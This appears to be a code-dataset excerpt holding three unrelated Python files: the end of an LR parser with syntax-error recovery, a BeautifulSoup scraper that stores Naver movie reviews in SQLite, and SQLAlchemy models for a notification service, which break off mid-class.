"KEYWORD", "SYMBOL"] else token
try:
self.action = self.parse_table[self.stack_state[-1]
][self.token[0]]
except:
self.action = "PANIC"
if self.action == ("accept"):
continue
elif self.action.startswith("shift"):
self.update_stack(self.token, Node(
"({}, {})".format(token, string)))
self.token = ["$", "$"] if self.token[0] == "$" else [
None, None]
elif self.action.startswith("reduce"):
production_rule = self.grammar[self.action.split("_")[1]]
self.root = Node(production_rule[0])
if self.root.name == "program":
end = Node("$", parent=self.root)
if production_rule[-1] != 'epsilon':
self.stack_token = self.stack_token[:2 -
len(production_rule)]
self.stack_state = self.stack_state[: 2 -
len(production_rule)]
for i in range(len(production_rule) - 2):
if len(self.nodes) > 0:
top = self.nodes.pop()[1]
top.parent = self.root
else:
top = Node("epsilon")
top.parent = self.root
self.action = self.parse_table[self.stack_state[-1]
][production_rule[0]]
self.update_stack([production_rule[0], None], self.root)
else:
self.error = True
self.err_string += f'#{self.scanner.line_index + 1} : syntax error , illegal {self.token[1]}\n'
# a) Skip the current input symbol
token, string = self.scanner.get_next_token()
if token == "$":
self.err_string += f'#{self.scanner.line_index} : syntax error , Unexpected EOF\n'
self.write_files()
return
self.token = [token, string]
self.token[0] = string if token in [
"KEYWORD", "SYMBOL"] else token
# a) Remove until you reach a goto
while(not any(value.startswith("goto")
for value in list(self.parse_table[self.stack_state[-1]].values()))):
self.err_string += f'syntax error , discarded {self.discard_token(self.stack_token[-1])} from stack\n'
self.stack_state.pop()
self.stack_token.pop()
discard = True
while discard:
list_of_gotos = []
for key, value in self.parse_table[self.stack_state[-1]].items():
if "goto" in value and key in self.non_terminals:
list_of_gotos.append((key, value))
list_of_gotos = sorted(
list_of_gotos, key=lambda x: x[0])
# c) Stack the nonterminal and goto
for rule_goto in list_of_gotos:
(non_terminal, state) = rule_goto
if self.token[0] in self.follow[non_terminal]:
discard = False
self.err_string += f'#{self.scanner.line_index + 1} : syntax error , missing {non_terminal}\n'
self.stack_token.append([non_terminal, None])
action = self.parse_table[self.stack_state[-1]
][non_terminal]
self.stack_state.append(action.split("_")[1])
break
# b) Discard zero or more input symbols
if discard:
self.err_string += f'#{self.scanner.line_index + 1} : syntax error , discarded {self.token[1]} from input\n'
token, string = self.scanner.get_next_token()
if token == "$":
self.err_string += f'#{self.scanner.line_index + 1} : syntax error , Unexpected EOF\n'
self.write_files()
return
self.token = [token, string]
self.token[0] = string if token in [
"KEYWORD", "SYMBOL"] else token
self.write_files()
def discard_token(self, token):
if token[1] is None:
return token[0]
if token[1] in self.scanner.KEYWORD:
return f"(KEYWORD, {token[1]})"
elif token[1] in (self.scanner.SYMBOL + self.scanner.EXTRA + ["=="]):
return f"(SYMBOL, {token[1]})"
return f"({token[0]}, {token[1]})"
def update_stack(self, token, node: Node):
if self.action == "accept":
return
self.stack_token.append(token)
self.stack_state.append(self.action.split("_")[1])
self.nodes.append([node.name, node])
def write_files(self):
with open('parse_tree.txt', 'a', encoding='utf-8') as f:
for pre, fill, node in RenderTree(self.root, childiter=reversed):
f.write("%s%s\n" % (pre, node.name))
f.close()
with open('syntax_errors.txt', 'a', encoding='utf-8') as f:
if not self.error:
f.write("There is no syntax error.")
else:
f.write(self.err_string)
f.close()
| hamilamailee/Compiler-Design | lrparser.py | lrparser.py | py | 6,757 | python | en | code | 0 | github-code | 13 |
721675923 | import urllib ,sqlite3
from bs4 import BeautifulSoup
params = urllib.parse.urlencode({'page':1})
url='https://movie.naver.com/movie/point/af/list.nhn?&%s' %params
#print(url)
response = urllib.request.urlopen(url)
#print(response)
navigator = BeautifulSoup(response,'html.parser')
table = navigator.find('table',class_='list_netizen')
#print(table)
list_records=[]
for i,r in enumerate(table.find_all('tr')):
for j,c in enumerate(r.find_all('td')):
if j == 0:
record={'번호':int(c.text.strip())}
elif j==2:
record.update({'평점':int(c.text.strip())})
elif j==3:
record.update({'영화':str(c.find('a',class_='movie').text.strip())})
record.update({'140자 평':str(c.text).split('\n')[2]})
elif j==4:
record.update({'글쓴이':c.find('a',class_='author').text.strip()})
record.update({'날짜':str(c.text).split('****')[1]})
try:
list_records.append(record)
except:
pass
#print(list_records)
conn = sqlite3.connect('d:/pythonwork/clolling/example.db')
c = conn.cursor()
c.execute('''create table if not exists movies
(Number real , grade real , movie text , Reviews text , author text , data text)''')
list_value = []
for i in list_records:
list_value.append(tuple(i.values()))
print(list_value)
c.executemany('INSERT INTO movies VALUES(?,?,?,?,?,?)',list_value)
conn.commit()
| sweetfruit77/Test | crawling/BeautifulSoup11.py | BeautifulSoup11.py | py | 1,442 | python | en | code | 0 | github-code | 13 |
1135510907 | import datetime
import itertools
import uuid
from flask import current_app, url_for
from notifications_utils.clients.encryption.encryption_client import EncryptionError
from notifications_utils.recipients import (
InvalidEmailError,
InvalidPhoneError,
try_validate_and_format_phone_number,
validate_email_address,
validate_phone_number,
)
from notifications_utils.template import PlainTextEmailTemplate, SMSMessageTemplate
from sqlalchemy import CheckConstraint, Index, UniqueConstraint
from sqlalchemy.dialects.postgresql import JSON, JSONB, UUID
from sqlalchemy.ext.associationproxy import association_proxy
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import validates
from sqlalchemy.orm.collections import attribute_mapped_collection
from app import db, encryption
from app.hashing import check_hash, hashpw
from app.history_meta import Versioned
from app.utils import (
DATETIME_FORMAT,
DATETIME_FORMAT_NO_TIMEZONE,
get_dt_string_or_none,
)
SMS_TYPE = "sms"
EMAIL_TYPE = "email"
LETTER_TYPE = "letter"
TEMPLATE_TYPES = [SMS_TYPE, EMAIL_TYPE]
NOTIFICATION_TYPES = [SMS_TYPE, EMAIL_TYPE]
template_types = db.Enum(*TEMPLATE_TYPES, name="template_type")
NORMAL = "normal"
PRIORITY = "priority"
TEMPLATE_PROCESS_TYPE = [NORMAL, PRIORITY]
SMS_AUTH_TYPE = "sms_auth"
EMAIL_AUTH_TYPE = "email_auth"
WEBAUTHN_AUTH_TYPE = "webauthn_auth"
USER_AUTH_TYPES = [SMS_AUTH_TYPE, EMAIL_AUTH_TYPE, WEBAUTHN_AUTH_TYPE]
DELIVERY_STATUS_CALLBACK_TYPE = "delivery_status"
COMPLAINT_CALLBACK_TYPE = "complaint"
SERVICE_CALLBACK_TYPES = [DELIVERY_STATUS_CALLBACK_TYPE, COMPLAINT_CALLBACK_TYPE]
def filter_null_value_fields(obj):
return dict(filter(lambda x: x[1] is not None, obj.items()))
class HistoryModel:
@classmethod
def from_original(cls, original):
history = cls()
history.update_from_original(original)
return history
def update_from_original(self, original):
for c in self.__table__.columns:
# in some cases, columns may have different names to their underlying db column - so only copy those
# that we can, and leave it up to subclasses to deal with any oddities/properties etc.
if hasattr(original, c.name):
setattr(self, c.name, getattr(original, c.name))
else:
current_app.logger.debug(
"{} has no column {} to copy from".format(original, c.name)
)
class User(db.Model):
__tablename__ = "users"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
name = db.Column(db.String, nullable=False, index=True, unique=False)
email_address = db.Column(db.String(255), nullable=False, index=True, unique=True)
created_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
updated_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=True,
onupdate=datetime.datetime.utcnow,
)
_password = db.Column(db.String, index=False, unique=False, nullable=False)
mobile_number = db.Column(db.String, index=False, unique=False, nullable=True)
password_changed_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
logged_in_at = db.Column(db.DateTime, nullable=True)
failed_login_count = db.Column(db.Integer, nullable=False, default=0)
state = db.Column(db.String, nullable=False, default="pending")
platform_admin = db.Column(db.Boolean, nullable=False, default=False)
current_session_id = db.Column(UUID(as_uuid=True), nullable=True)
auth_type = db.Column(
db.String,
db.ForeignKey("auth_type.name"),
index=True,
nullable=False,
default=SMS_AUTH_TYPE,
)
email_access_validated_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
# either email auth or a mobile number must be provided
CheckConstraint(
"auth_type in ('email_auth', 'webauthn_auth') or mobile_number is not null"
)
services = db.relationship("Service", secondary="user_to_service", backref="users")
organizations = db.relationship(
"Organization", secondary="user_to_organization", backref="users"
)
@validates("mobile_number")
def validate_mobile_number(self, key, number):
try:
if number is not None:
return validate_phone_number(number, international=True)
except InvalidPhoneError as err:
raise ValueError(str(err)) from err
@property
def password(self):
raise AttributeError("Password not readable")
@property
def can_use_webauthn(self):
if self.platform_admin:
return True
if self.auth_type == "webauthn_auth":
return True
return any(
str(service.id) == current_app.config["NOTIFY_SERVICE_ID"]
for service in self.services
)
@password.setter
def password(self, password):
self._password = hashpw(password)
def check_password(self, password):
return check_hash(password, self._password)
def get_permissions(self, service_id=None):
from app.dao.permissions_dao import permission_dao
if service_id:
return [
x.permission
for x in permission_dao.get_permissions_by_user_id_and_service_id(
self.id, service_id
)
]
retval = {}
for x in permission_dao.get_permissions_by_user_id(self.id):
service_id = str(x.service_id)
if service_id not in retval:
retval[service_id] = []
retval[service_id].append(x.permission)
return retval
def serialize(self):
return {
"id": self.id,
"name": self.name,
"email_address": self.email_address,
"auth_type": self.auth_type,
"current_session_id": self.current_session_id,
"failed_login_count": self.failed_login_count,
"email_access_validated_at": self.email_access_validated_at.strftime(
DATETIME_FORMAT
),
"logged_in_at": get_dt_string_or_none(self.logged_in_at),
"mobile_number": self.mobile_number,
"organizations": [x.id for x in self.organizations if x.active],
"password_changed_at": self.password_changed_at.strftime(
DATETIME_FORMAT_NO_TIMEZONE
),
"permissions": self.get_permissions(),
"platform_admin": self.platform_admin,
"services": [x.id for x in self.services if x.active],
"can_use_webauthn": self.can_use_webauthn,
"state": self.state,
}
def serialize_for_users_list(self):
return {
"id": self.id,
"name": self.name,
"email_address": self.email_address,
"mobile_number": self.mobile_number,
}
class ServiceUser(db.Model):
__tablename__ = "user_to_service"
user_id = db.Column(UUID(as_uuid=True), db.ForeignKey("users.id"), primary_key=True)
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), primary_key=True
)
__table_args__ = (
UniqueConstraint("user_id", "service_id", name="uix_user_to_service"),
)
user_to_organization = db.Table(
"user_to_organization",
db.Model.metadata,
db.Column("user_id", UUID(as_uuid=True), db.ForeignKey("users.id")),
db.Column("organization_id", UUID(as_uuid=True), db.ForeignKey("organization.id")),
UniqueConstraint("user_id", "organization_id", name="uix_user_to_organization"),
)
user_folder_permissions = db.Table(
"user_folder_permissions",
db.Model.metadata,
db.Column("user_id", UUID(as_uuid=True), primary_key=True),
db.Column(
"template_folder_id",
UUID(as_uuid=True),
db.ForeignKey("template_folder.id"),
primary_key=True,
),
db.Column("service_id", UUID(as_uuid=True), primary_key=True),
db.ForeignKeyConstraint(
["user_id", "service_id"],
["user_to_service.user_id", "user_to_service.service_id"],
),
db.ForeignKeyConstraint(
["template_folder_id", "service_id"],
["template_folder.id", "template_folder.service_id"],
),
)
BRANDING_GOVUK = "govuk" # Deprecated outside migrations
BRANDING_ORG = "org"
BRANDING_BOTH = "both"
BRANDING_ORG_BANNER = "org_banner"
BRANDING_TYPES = [BRANDING_ORG, BRANDING_BOTH, BRANDING_ORG_BANNER]
class BrandingTypes(db.Model):
__tablename__ = "branding_type"
name = db.Column(db.String(255), primary_key=True)
class EmailBranding(db.Model):
__tablename__ = "email_branding"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
colour = db.Column(db.String(7), nullable=True)
logo = db.Column(db.String(255), nullable=True)
name = db.Column(db.String(255), unique=True, nullable=False)
text = db.Column(db.String(255), nullable=True)
brand_type = db.Column(
db.String(255),
db.ForeignKey("branding_type.name"),
index=True,
nullable=False,
default=BRANDING_ORG,
)
def serialize(self):
serialized = {
"id": str(self.id),
"colour": self.colour,
"logo": self.logo,
"name": self.name,
"text": self.text,
"brand_type": self.brand_type,
}
return serialized
service_email_branding = db.Table(
"service_email_branding",
db.Model.metadata,
# service_id is a primary key as you can only have one email branding per service
db.Column(
"service_id",
UUID(as_uuid=True),
db.ForeignKey("services.id"),
primary_key=True,
nullable=False,
),
db.Column(
"email_branding_id",
UUID(as_uuid=True),
db.ForeignKey("email_branding.id"),
nullable=False,
),
)
INTERNATIONAL_SMS_TYPE = "international_sms"
INBOUND_SMS_TYPE = "inbound_sms"
SCHEDULE_NOTIFICATIONS = "schedule_notifications"
EMAIL_AUTH = "email_auth"
UPLOAD_DOCUMENT = "upload_document"
EDIT_FOLDER_PERMISSIONS = "edit_folder_permissions"
SERVICE_PERMISSION_TYPES = [
EMAIL_TYPE,
SMS_TYPE,
INTERNATIONAL_SMS_TYPE,
INBOUND_SMS_TYPE,
SCHEDULE_NOTIFICATIONS,
EMAIL_AUTH,
UPLOAD_DOCUMENT,
EDIT_FOLDER_PERMISSIONS,
]
class ServicePermissionTypes(db.Model):
__tablename__ = "service_permission_types"
name = db.Column(db.String(255), primary_key=True)
class Domain(db.Model):
__tablename__ = "domain"
domain = db.Column(db.String(255), primary_key=True)
organization_id = db.Column(
"organization_id",
UUID(as_uuid=True),
db.ForeignKey("organization.id"),
nullable=False,
)
ORGANIZATION_TYPES = ["federal", "state", "other"]
class OrganizationTypes(db.Model):
__tablename__ = "organization_types"
name = db.Column(db.String(255), primary_key=True)
annual_free_sms_fragment_limit = db.Column(db.BigInteger, nullable=False)
class Organization(db.Model):
__tablename__ = "organization"
id = db.Column(
UUID(as_uuid=True), primary_key=True, default=uuid.uuid4, unique=False
)
name = db.Column(db.String(255), nullable=False, unique=True, index=True)
active = db.Column(db.Boolean, nullable=False, default=True)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
agreement_signed = db.Column(db.Boolean, nullable=True)
agreement_signed_at = db.Column(db.DateTime, nullable=True)
agreement_signed_by_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("users.id"),
nullable=True,
)
agreement_signed_by = db.relationship("User")
agreement_signed_on_behalf_of_name = db.Column(db.String(255), nullable=True)
agreement_signed_on_behalf_of_email_address = db.Column(
db.String(255), nullable=True
)
agreement_signed_version = db.Column(db.Float, nullable=True)
organization_type = db.Column(
db.String(255),
db.ForeignKey("organization_types.name"),
unique=False,
nullable=True,
)
request_to_go_live_notes = db.Column(db.Text)
domains = db.relationship(
"Domain",
)
email_branding = db.relationship("EmailBranding")
email_branding_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("email_branding.id"),
nullable=True,
)
notes = db.Column(db.Text, nullable=True)
purchase_order_number = db.Column(db.String(255), nullable=True)
billing_contact_names = db.Column(db.Text, nullable=True)
billing_contact_email_addresses = db.Column(db.Text, nullable=True)
billing_reference = db.Column(db.String(255), nullable=True)
@property
def live_services(self):
return [
service
for service in self.services
if service.active and not service.restricted
]
@property
def domain_list(self):
return [domain.domain for domain in self.domains]
def serialize(self):
return {
"id": str(self.id),
"name": self.name,
"active": self.active,
"organization_type": self.organization_type,
"email_branding_id": self.email_branding_id,
"agreement_signed": self.agreement_signed,
"agreement_signed_at": self.agreement_signed_at,
"agreement_signed_by_id": self.agreement_signed_by_id,
"agreement_signed_on_behalf_of_name": self.agreement_signed_on_behalf_of_name,
"agreement_signed_on_behalf_of_email_address": self.agreement_signed_on_behalf_of_email_address,
"agreement_signed_version": self.agreement_signed_version,
"domains": self.domain_list,
"request_to_go_live_notes": self.request_to_go_live_notes,
"count_of_live_services": len(self.live_services),
"notes": self.notes,
"purchase_order_number": self.purchase_order_number,
"billing_contact_names": self.billing_contact_names,
"billing_contact_email_addresses": self.billing_contact_email_addresses,
"billing_reference": self.billing_reference,
}
def serialize_for_list(self):
return {
"name": self.name,
"id": str(self.id),
"active": self.active,
"count_of_live_services": len(self.live_services),
"domains": self.domain_list,
"organization_type": self.organization_type,
}
class Service(db.Model, Versioned):
__tablename__ = "services"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
name = db.Column(db.String(255), nullable=False, unique=True)
created_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
updated_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=True,
onupdate=datetime.datetime.utcnow,
)
active = db.Column(
db.Boolean, index=False, unique=False, nullable=False, default=True
)
message_limit = db.Column(db.BigInteger, index=False, unique=False, nullable=False)
total_message_limit = db.Column(
db.BigInteger, index=False, unique=False, nullable=False
)
restricted = db.Column(db.Boolean, index=False, unique=False, nullable=False)
email_from = db.Column(db.Text, index=False, unique=True, nullable=False)
created_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=False
)
created_by = db.relationship("User", foreign_keys=[created_by_id])
prefix_sms = db.Column(db.Boolean, nullable=False, default=True)
organization_type = db.Column(
db.String(255),
db.ForeignKey("organization_types.name"),
unique=False,
nullable=True,
)
rate_limit = db.Column(db.Integer, index=False, nullable=False, default=3000)
contact_link = db.Column(db.String(255), nullable=True, unique=False)
volume_sms = db.Column(db.Integer(), nullable=True, unique=False)
volume_email = db.Column(db.Integer(), nullable=True, unique=False)
consent_to_research = db.Column(db.Boolean, nullable=True)
count_as_live = db.Column(db.Boolean, nullable=False, default=True)
go_live_user_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), nullable=True
)
go_live_user = db.relationship("User", foreign_keys=[go_live_user_id])
go_live_at = db.Column(db.DateTime, nullable=True)
organization_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("organization.id"), index=True, nullable=True
)
organization = db.relationship("Organization", backref="services")
notes = db.Column(db.Text, nullable=True)
purchase_order_number = db.Column(db.String(255), nullable=True)
billing_contact_names = db.Column(db.Text, nullable=True)
billing_contact_email_addresses = db.Column(db.Text, nullable=True)
billing_reference = db.Column(db.String(255), nullable=True)
email_branding = db.relationship(
"EmailBranding",
secondary=service_email_branding,
uselist=False,
backref=db.backref("services", lazy="dynamic"),
)
@classmethod
def from_json(cls, data):
"""
Assumption: data has been validated appropriately.
Returns a Service object based on the provided data. Deserialises created_by to created_by_id as marshmallow
would.
"""
# validate json with marshmallow
fields = data.copy()
fields["created_by_id"] = fields.pop("created_by")
return cls(**fields)
def get_inbound_number(self):
if self.inbound_number and self.inbound_number.active:
return self.inbound_number.number
def get_default_sms_sender(self):
default_sms_sender = [x for x in self.service_sms_senders if x.is_default]
return default_sms_sender[0].sms_sender
def get_default_reply_to_email_address(self):
default_reply_to = [x for x in self.reply_to_email_addresses if x.is_default]
return default_reply_to[0].email_address if default_reply_to else None
def has_permission(self, permission):
return permission in [p.permission for p in self.permissions]
def serialize_for_org_dashboard(self):
return {
"id": str(self.id),
"name": self.name,
"active": self.active,
"restricted": self.restricted,
}
class AnnualBilling(db.Model):
__tablename__ = "annual_billing"
id = db.Column(
UUID(as_uuid=True), primary_key=True, default=uuid.uuid4, unique=False
)
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
unique=False,
index=True,
nullable=False,
)
financial_year_start = db.Column(
db.Integer, nullable=False, default=True, unique=False
)
free_sms_fragment_limit = db.Column(
db.Integer, nullable=False, index=False, unique=False
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
UniqueConstraint(
"financial_year_start", "service_id", name="ix_annual_billing_service_id"
)
service = db.relationship(
Service, backref=db.backref("annual_billing", uselist=True)
)
__table_args__ = (
UniqueConstraint(
"service_id",
"financial_year_start",
name="uix_service_id_financial_year_start",
),
)
def serialize_free_sms_items(self):
return {
"free_sms_fragment_limit": self.free_sms_fragment_limit,
"financial_year_start": self.financial_year_start,
}
def serialize(self):
def serialize_service():
return {"id": str(self.service_id), "name": self.service.name}
return {
"id": str(self.id),
"free_sms_fragment_limit": self.free_sms_fragment_limit,
"service_id": self.service_id,
"financial_year_start": self.financial_year_start,
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"updated_at": get_dt_string_or_none(self.updated_at),
"service": serialize_service() if self.service else None,
}
class InboundNumber(db.Model):
__tablename__ = "inbound_numbers"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
number = db.Column(db.String(255), unique=True, nullable=False)
provider = db.Column(db.String(), nullable=False)
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
unique=True,
index=True,
nullable=True,
)
service = db.relationship(
Service, backref=db.backref("inbound_number", uselist=False)
)
active = db.Column(
db.Boolean, index=False, unique=False, nullable=False, default=True
)
created_at = db.Column(
db.DateTime, default=datetime.datetime.utcnow, nullable=False
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
def serialize(self):
def serialize_service():
return {"id": str(self.service_id), "name": self.service.name}
return {
"id": str(self.id),
"number": self.number,
"provider": self.provider,
"service": serialize_service() if self.service else None,
"active": self.active,
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"updated_at": get_dt_string_or_none(self.updated_at),
}
class ServiceSmsSender(db.Model):
__tablename__ = "service_sms_senders"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
sms_sender = db.Column(db.String(11), nullable=False)
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
index=True,
nullable=False,
unique=False,
)
service = db.relationship(
Service, backref=db.backref("service_sms_senders", uselist=True)
)
is_default = db.Column(db.Boolean, nullable=False, default=True)
archived = db.Column(db.Boolean, nullable=False, default=False)
inbound_number_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("inbound_numbers.id"),
unique=True,
index=True,
nullable=True,
)
inbound_number = db.relationship(
InboundNumber, backref=db.backref("inbound_number", uselist=False)
)
created_at = db.Column(
db.DateTime, default=datetime.datetime.utcnow, nullable=False
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
def get_reply_to_text(self):
return try_validate_and_format_phone_number(self.sms_sender)
def serialize(self):
return {
"id": str(self.id),
"sms_sender": self.sms_sender,
"service_id": str(self.service_id),
"is_default": self.is_default,
"archived": self.archived,
"inbound_number_id": str(self.inbound_number_id)
if self.inbound_number_id
else None,
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"updated_at": get_dt_string_or_none(self.updated_at),
}
class ServicePermission(db.Model):
__tablename__ = "service_permissions"
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
primary_key=True,
index=True,
nullable=False,
)
permission = db.Column(
db.String(255),
db.ForeignKey("service_permission_types.name"),
index=True,
primary_key=True,
nullable=False,
)
created_at = db.Column(
db.DateTime, default=datetime.datetime.utcnow, nullable=False
)
service_permission_types = db.relationship(
Service, backref=db.backref("permissions", cascade="all, delete-orphan")
)
def __repr__(self):
return "<{} has service permission: {}>".format(
self.service_id, self.permission
)
MOBILE_TYPE = "mobile"
EMAIL_TYPE = "email"
GUEST_LIST_RECIPIENT_TYPE = [MOBILE_TYPE, EMAIL_TYPE]
guest_list_recipient_types = db.Enum(*GUEST_LIST_RECIPIENT_TYPE, name="recipient_type")
class ServiceGuestList(db.Model):
__tablename__ = "service_whitelist"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), index=True, nullable=False
)
service = db.relationship("Service", backref="guest_list")
recipient_type = db.Column(guest_list_recipient_types, nullable=False)
recipient = db.Column(db.String(255), nullable=False)
created_at = db.Column(db.DateTime, default=datetime.datetime.utcnow)
@classmethod
def from_string(cls, service_id, recipient_type, recipient):
instance = cls(service_id=service_id, recipient_type=recipient_type)
try:
if recipient_type == MOBILE_TYPE:
instance.recipient = validate_phone_number(
recipient, international=True
)
elif recipient_type == EMAIL_TYPE:
instance.recipient = validate_email_address(recipient)
else:
raise ValueError("Invalid recipient type")
except InvalidPhoneError:
raise ValueError('Invalid guest list: "{}"'.format(recipient))
except InvalidEmailError:
raise ValueError('Invalid guest list: "{}"'.format(recipient))
else:
return instance
def __repr__(self):
return "Recipient {} of type: {}".format(self.recipient, self.recipient_type)
class ServiceInboundApi(db.Model, Versioned):
__tablename__ = "service_inbound_api"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
index=True,
nullable=False,
unique=True,
)
service = db.relationship("Service", backref="inbound_api")
url = db.Column(db.String(), nullable=False)
_bearer_token = db.Column("bearer_token", db.String(), nullable=False)
created_at = db.Column(
db.DateTime, default=datetime.datetime.utcnow, nullable=False
)
updated_at = db.Column(db.DateTime, nullable=True)
updated_by = db.relationship("User")
updated_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=False
)
@property
def bearer_token(self):
return encryption.decrypt(self._bearer_token)
@bearer_token.setter
def bearer_token(self, bearer_token):
if bearer_token:
self._bearer_token = encryption.encrypt(str(bearer_token))
def serialize(self):
return {
"id": str(self.id),
"service_id": str(self.service_id),
"url": self.url,
"updated_by_id": str(self.updated_by_id),
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"updated_at": get_dt_string_or_none(self.updated_at),
}
class ServiceCallbackApi(db.Model, Versioned):
__tablename__ = "service_callback_api"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), index=True, nullable=False
)
service = db.relationship("Service", backref="service_callback_api")
url = db.Column(db.String(), nullable=False)
callback_type = db.Column(
db.String(), db.ForeignKey("service_callback_type.name"), nullable=True
)
_bearer_token = db.Column("bearer_token", db.String(), nullable=False)
created_at = db.Column(
db.DateTime, default=datetime.datetime.utcnow, nullable=False
)
updated_at = db.Column(db.DateTime, nullable=True)
updated_by = db.relationship("User")
updated_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=False
)
__table_args__ = (
UniqueConstraint(
"service_id", "callback_type", name="uix_service_callback_type"
),
)
@property
def bearer_token(self):
return encryption.decrypt(self._bearer_token)
@bearer_token.setter
def bearer_token(self, bearer_token):
if bearer_token:
self._bearer_token = encryption.encrypt(str(bearer_token))
def serialize(self):
return {
"id": str(self.id),
"service_id": str(self.service_id),
"url": self.url,
"updated_by_id": str(self.updated_by_id),
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"updated_at": get_dt_string_or_none(self.updated_at),
}
class ServiceCallbackType(db.Model):
__tablename__ = "service_callback_type"
name = db.Column(db.String, primary_key=True)
class ApiKey(db.Model, Versioned):
__tablename__ = "api_keys"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
name = db.Column(db.String(255), nullable=False)
_secret = db.Column("secret", db.String(255), unique=True, nullable=False)
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), index=True, nullable=False
)
service = db.relationship("Service", backref="api_keys")
key_type = db.Column(
db.String(255), db.ForeignKey("key_types.name"), index=True, nullable=False
)
expiry_date = db.Column(db.DateTime)
created_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
updated_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=True,
onupdate=datetime.datetime.utcnow,
)
created_by = db.relationship("User")
created_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=False
)
__table_args__ = (
Index(
"uix_service_to_key_name",
"service_id",
"name",
unique=True,
postgresql_where=expiry_date.is_(None),
),
)
@property
def secret(self):
return encryption.decrypt(self._secret)
@secret.setter
def secret(self, secret):
if secret:
self._secret = encryption.encrypt(str(secret))
KEY_TYPE_NORMAL = "normal"
KEY_TYPE_TEAM = "team"
KEY_TYPE_TEST = "test"
class KeyTypes(db.Model):
__tablename__ = "key_types"
name = db.Column(db.String(255), primary_key=True)
class TemplateProcessTypes(db.Model):
__tablename__ = "template_process_type"
name = db.Column(db.String(255), primary_key=True)
class TemplateFolder(db.Model):
__tablename__ = "template_folder"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), nullable=False
)
name = db.Column(db.String, nullable=False)
parent_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("template_folder.id"), nullable=True
)
service = db.relationship("Service", backref="all_template_folders")
parent = db.relationship("TemplateFolder", remote_side=[id], backref="subfolders")
users = db.relationship(
"ServiceUser",
uselist=True,
backref=db.backref(
"folders", foreign_keys="user_folder_permissions.c.template_folder_id"
),
secondary="user_folder_permissions",
primaryjoin="TemplateFolder.id == user_folder_permissions.c.template_folder_id",
)
__table_args__ = (UniqueConstraint("id", "service_id", name="ix_id_service_id"), {})
def serialize(self):
return {
"id": self.id,
"name": self.name,
"parent_id": self.parent_id,
"service_id": self.service_id,
"users_with_permission": self.get_users_with_permission(),
}
def is_parent_of(self, other):
while other.parent is not None:
if other.parent == self:
return True
other = other.parent
return False
def get_users_with_permission(self):
service_users = self.users
users_with_permission = [
str(service_user.user_id) for service_user in service_users
]
return users_with_permission
template_folder_map = db.Table(
"template_folder_map",
db.Model.metadata,
# template_id is a primary key as a template can only belong in one folder
db.Column(
"template_id",
UUID(as_uuid=True),
db.ForeignKey("templates.id"),
primary_key=True,
nullable=False,
),
db.Column(
"template_folder_id",
UUID(as_uuid=True),
db.ForeignKey("template_folder.id"),
nullable=False,
),
)
class TemplateBase(db.Model):
__abstract__ = True
def __init__(self, **kwargs):
if "template_type" in kwargs:
self.template_type = kwargs.pop("template_type")
super().__init__(**kwargs)
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
name = db.Column(db.String(255), nullable=False)
template_type = db.Column(template_types, nullable=False)
created_at = db.Column(
